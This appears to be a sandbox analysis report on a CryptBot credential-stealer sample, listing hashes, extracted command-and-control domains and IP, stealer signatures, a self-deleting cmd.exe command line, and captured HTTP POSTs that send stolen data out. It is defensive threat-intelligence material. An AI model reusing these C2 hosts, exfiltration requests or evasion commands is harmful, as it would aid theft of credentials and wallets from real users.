Overview

overview

10

Static

static

fc0701924a...f6.exe

windows7_x64

10

fc0701924a...f6.exe

windows10_x64

10

Analysis

  • max time kernel
    121s
  • max time network
    125s
  • platform
    windows10_x64
  • resource
    win10-en-20211014
  • submitted
    05/12/2021, 10:54 UTC

Sharing

Copy URL
Twitter E-mail
Report Analysis Logs

General

  • Target

    fc0701924aed7be6e65f20c16d222ef6.exe

  • Size

    392KB

  • MD5

    fc0701924aed7be6e65f20c16d222ef6

  • SHA1

    c04d8dee265d5ed32f30f9bf466b6d2676dae4eb

  • SHA256

    82a634123b202b7960b6cc3b52125352a2006e40cc2ccf3d62c1519191981e71

  • SHA512

    eea30d68123f94587d324a58a31f51bba985bd2750607a8615f370cd2c79b73ace4ea7ec00a3e6a009118064169859f150cf5e489d587454cbaa2b0f42234aee

Score
10/10
cryptbotdiscoveryspywarestealer

Malware Config

Extracted

Family

cryptbot

C2

unic12m.top

unic12e.top

Signatures

  • CryptBot

    A C++ stealer distributed widely in bundle with other software.

    spywarestealercryptbot
  • Reads data files stored by FTP clients 2 TTPs

    Tries to access configuration files associated with programs like FileZilla.

    spywarestealer
  • Reads user/profile data of web browsers 2 TTPs

    Infostealers often target stored browser data, which can include saved credentials etc.

    spywarestealer
  • Accesses cryptocurrency files/wallets, possible credential harvesting 2 TTPs
    spyware
  • Checks installed software on the system 1 TTPs

    Looks up Uninstall key entries in the registry to enumerate software on the system.

    discovery
  • Enumerates physical storage devices 1 TTPs

    Attempts to interact with connected storage/optical drive(s). Likely ransomware behaviour.

  • Checks processor information in registry 2 TTPs 2 IoCs

    Processor information is often read in order to detect sandboxing environments.

  • Delays execution with timeout.exe 1 IoCs
    evasion
  • Suspicious use of WriteProcessMemory 6 IoCs

Processes

  • C:\Users\Admin\AppData\Local\Temp\fc0701924aed7be6e65f20c16d222ef6.exe
    "C:\Users\Admin\AppData\Local\Temp\fc0701924aed7be6e65f20c16d222ef6.exe"
    1⤵
    • Checks processor information in registry
    • Suspicious use of WriteProcessMemory
    PID:3380
    • C:\Windows\SysWOW64\cmd.exe
      "C:\Windows\system32\cmd.exe" /c rd /s /q C:\Users\Admin\AppData\Local\Temp\rikIfNPY & timeout 4 & del /f /q "C:\Users\Admin\AppData\Local\Temp\fc0701924aed7be6e65f20c16d222ef6.exe"
      2⤵
      • Suspicious use of WriteProcessMemory
      PID:452
      • C:\Windows\SysWOW64\timeout.exe
        timeout 4
        3⤵
        • Delays execution with timeout.exe
        PID:1916

Network

  • flag-us
    DNS
    time.windows.com
    Remote address:
    8.8.8.8:53
    Request
    time.windows.com
    IN A
    Response
    time.windows.com
    IN CNAME
    twc.trafficmanager.net
    twc.trafficmanager.net
    IN A
    20.101.57.9
  • flag-us
    DNS
    unic12m.top
    fc0701924aed7be6e65f20c16d222ef6.exe
    Remote address:
    8.8.8.8:53
    Request
    unic12m.top
    IN A
    Response
    unic12m.top
    IN A
    5.188.38.39
  • flag-ru
    POST
    http://unic12m.top/index.php
    fc0701924aed7be6e65f20c16d222ef6.exe
    Remote address:
    5.188.38.39:80
    Request
    POST /index.php HTTP/1.1
    Content-Type: multipart/form-data; boundary=---------------------------
    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/88.0.4324.104 Safari/537.36
    Host: unic12m.top
    Content-Length: 1611925
    Cache-Control: no-cache
    Response
    HTTP/1.1 200 OK
    Server: nginx
    Date: Sun, 05 Dec 2021 10:54:45 GMT
    Content-Type: text/html; charset=UTF-8
    Transfer-Encoding: chunked
    Connection: close
    Vary: Accept-Encoding
  • flag-us
    DNS
    unic12e.top
    fc0701924aed7be6e65f20c16d222ef6.exe
    Remote address:
    8.8.8.8:53
    Request
    unic12e.top
    IN A
    Response
    unic12e.top
    IN A
    5.188.38.39
  • flag-ru
    POST
    http://unic12e.top/index.php
    fc0701924aed7be6e65f20c16d222ef6.exe
    Remote address:
    5.188.38.39:80
    Request
    POST /index.php HTTP/1.1
    Content-Type: multipart/form-data; boundary=---------------------------
    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/88.0.4324.104 Safari/537.36
    Host: unic12e.top
    Content-Length: 1611908
    Cache-Control: no-cache
    Response
    HTTP/1.1 200 OK
    Server: nginx
    Date: Sun, 05 Dec 2021 10:54:55 GMT
    Content-Type: text/html; charset=UTF-8
    Transfer-Encoding: chunked
    Connection: close
    Vary: Accept-Encoding
  • 52.109.8.21:443
    322 B
     7
  • 5.188.38.39:80
    http://unic12m.top/index.php
    http
    fc0701924aed7be6e65f20c16d222ef6.exe
    1.7MB
     36.1kB
     1112
    785

    HTTP Request

    POST http://unic12m.top/index.php

    HTTP Response

    200
  • 5.188.38.39:80
    http://unic12e.top/index.php
    http
    fc0701924aed7be6e65f20c16d222ef6.exe
    1.7MB
     24.2kB
     1111
    588

    HTTP Request

    POST http://unic12e.top/index.php

    HTTP Response

    200
  • 8.8.8.8:53
    time.windows.com
    dns
    62 B
     114 B
     1
    1

    DNS Request

    time.windows.com

    DNS Response

    20.101.57.9

  • 20.101.57.9:123
    time.windows.com
    ntp
    76 B
     1
  • 8.8.8.8:53
    unic12m.top
    dns
    fc0701924aed7be6e65f20c16d222ef6.exe
    57 B
     73 B
     1
    1

    DNS Request

    unic12m.top

    DNS Response

    5.188.38.39

  • 8.8.8.8:53
    unic12e.top
    dns
    fc0701924aed7be6e65f20c16d222ef6.exe
    57 B
     73 B
     1
    1

    DNS Request

    unic12e.top

    DNS Response

    5.188.38.39

MITRE ATT&CK Enterprise v6

Replay Monitor

Loading Replay Monitor...

Downloads

  • memory/3380-115-0x00000000007D9000-0x00000000007FF000-memory.dmp

    Filesize

    152KB

    Download

  • memory/3380-117-0x0000000000400000-0x0000000000469000-memory.dmp

    Filesize

    420KB

    Download

  • memory/3380-116-0x00000000006E0000-0x0000000000727000-memory.dmp

    Filesize

    284KB

    Download

We care about your privacy.

This website stores cookies on your computer. These cookies are used to improve your website experience and provide more personalized services to you, both on this website and through other media. To find out more about the cookies we use, see our Privacy Policy.